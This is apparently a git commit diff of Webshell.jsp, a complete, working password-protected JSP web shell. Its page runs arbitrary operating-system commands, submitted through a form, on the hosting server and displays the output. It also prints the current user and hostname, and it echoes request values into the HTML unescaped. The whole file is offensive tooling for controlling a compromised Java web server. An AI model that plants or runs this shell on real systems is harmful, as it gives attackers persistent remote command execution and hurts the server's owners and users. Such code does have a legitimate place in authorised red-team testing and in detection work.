Webshell.jsp updated

This commit is contained in:
mgeeky 2019-06-28 12:37:49 +02:00
parent 685a6428ed
commit f0f68868f3

View File

@ -5,79 +5,79 @@
<%! <%!
// ===================================================================== // =====================================================================
// Setup global password necessary to pass before using that webshell. // Setup global password necessary to pass before using that webshell.
public String HardcodedPassword = "5eQzrXZHZwJNLvm6Q2b7PR6r"; public String HardcodedPassword = "5eQzrXZHZwJNLvm6Q2b7PR6r";
// ===================================================================== // =====================================================================
public String execute(String pass, String cmd, Boolean skip) { public String execute(String pass, String cmd, Boolean skip) {
StringBuilder res = new StringBuilder(); StringBuilder res = new StringBuilder();
if (cmd != null && cmd.length() > 0 && ((skip) || (pass.equals(HardcodedPassword) || HardcodedPassword.toLowerCase().equals("none")))){ if (cmd != null && cmd.length() > 0 && ((skip) || (pass.equals(HardcodedPassword) || HardcodedPassword.toLowerCase().equals("none")))){
try { try {
Process proc = Runtime.getRuntime().exec(cmd); Process proc = Runtime.getRuntime().exec(cmd);
OutputStream outs = proc.getOutputStream(); OutputStream outs = proc.getOutputStream();
InputStream ins = proc.getInputStream(); InputStream ins = proc.getInputStream();
DataInputStream datains = new DataInputStream(ins); DataInputStream datains = new DataInputStream(ins);
String datainsline = datains.readLine(); String datainsline = datains.readLine();
while ( datainsline != null) { while ( datainsline != null) {
res.append(datainsline + "<br/>"); res.append(datainsline + "<br/>");
datainsline = datains.readLine(); datainsline = datains.readLine();
} }
} catch( IOException e) { } catch( IOException e) {
return "IOException: " + e.getMessage(); return "IOException: " + e.getMessage();
} }
} }
else { else {
return "Wrong password or no command issued."; return "Wrong password or no command issued.";
} }
String out = res.toString(); String out = res.toString();
if (out != null && out.length() > 5 && out.indexOf("<br/>") != -1) { if (out != null && out.length() > 5 && out.indexOf("<br/>") != -1) {
out = out.substring(0, out.length() - 5); out = out.substring(0, out.length() - 5);
} }
out = out.replaceAll("(\r\n|\n\r|\n|\r)", "<br/>"); out = out.replaceAll("(\r\n|\n\r|\n|\r)", "<br/>");
return out; return out;
} }
%><!DOCTYPE html> %><!DOCTYPE html>
<html> <html>
<head> <head>
<title>JSP Application</title> <title>JSP Application</title>
</head> </head>
<body> <body>
<h3>Authenticated JSP Webshell.</h3> <h3>Authenticated JSP Webshell.</h3>
<i style="font-size:12px">You need to provide a valid password in order to leverage this application.</i> <i style="font-size:12px">You need to provide a valid password in order to leverage this application.</i>
<br/> <br/>
<font style="font-size:5px" style="font-style:italic;color:grey">coded by <a href="https://github.com/mgeeky">mgeeky</a></font> <font style="font-size:5px" style="font-style:italic;color:grey">coded by <a href="https://github.com/mgeeky">mgeeky</a></font>
<br/> <br/>
<hr/> <hr/>
<form method=post> <form method=post>
<table style="width:100%; font-size: 12px"> <table style="width:100%; font-size: 12px">
<tr> <tr>
<td>OS:</td><td style="width:100%"> <td>OS:</td><td style="width:100%">
<% out.print(System.getProperty("os.name")); %> <% out.print(System.getProperty("os.name")); %>
</td> </td>
</tr> </tr>
<tr> <tr>
<td><b style="color:red; font-size:10px">Password:</b></td><td style="width:90%"><input type=password width=40 name="password" value='<% out.print((request.getParameter("password") != null) ? request.getParameter("password") : ""); %>' /></td> <td><b style="color:red; font-size:10px">Password:</b></td><td style="width:90%"><input type=password width=40 name="password" value='<% out.print((request.getParameter("password") != null) ? request.getParameter("password") : ""); %>' /></td>
</tr> </tr>
<tr> <tr>
<td><b style="color:blue; font-size:11px"><% out.print(execute("", "whoami", true) + "@" + execute("", "hostname", true));%></b></td><td style="width:90%"><input type=text size=100 name="cmd" value='<% out.print((request.getParameter("cmd") != null) ? request.getParameter("cmd") : "uname -a"); %>' onClick="" onkeydown="if (event.keyCode == 13) { this.form.submit(); return false; }" /></td> <td><b style="color:blue; font-size:11px"><% out.print(execute("", "whoami", true) + "@" + execute("", "hostname", true));%></b></td><td style="width:90%"><input type=text size=100 name="cmd" value='<% out.print((request.getParameter("cmd") != null) ? request.getParameter("cmd") : "uname -a"); %>' onClick="" onkeydown="if (event.keyCode == 13) { this.form.submit(); return false; }" /></td>
</tr> </tr>
<tr> <tr>
<td><input type=submit style="position:absolute;left:-9999px;width:1px;height:1px;" tabindex="-1"/></td><td></td> <td><input type=submit style="position:absolute;left:-9999px;width:1px;height:1px;" tabindex="-1"/></td><td></td>
</tr> </tr>
</table> </table>
</form> </form>
<hr /> <hr />
<pre style="background-color:black;color:lightgreen;padding: 5px 25px 25px 25px;"><% <pre style="background-color:black;color:lightgreen;padding: 5px 25px 25px 25px;"><%
if (request.getParameter("cmd") != null && request.getParameter("password") != null) { if (request.getParameter("cmd") != null && request.getParameter("password") != null) {
out.println("<br/>server$ " + request.getParameter("cmd") + "<br/>"); out.println("<br/>server$ " + request.getParameter("cmd") + "<br/>");
out.println(execute(request.getParameter("password"), request.getParameter("cmd"), false)); out.println(execute(request.getParameter("password"), request.getParameter("cmd"), false));
} }
%></pre> %></pre>
</body> </body>
</html> </html>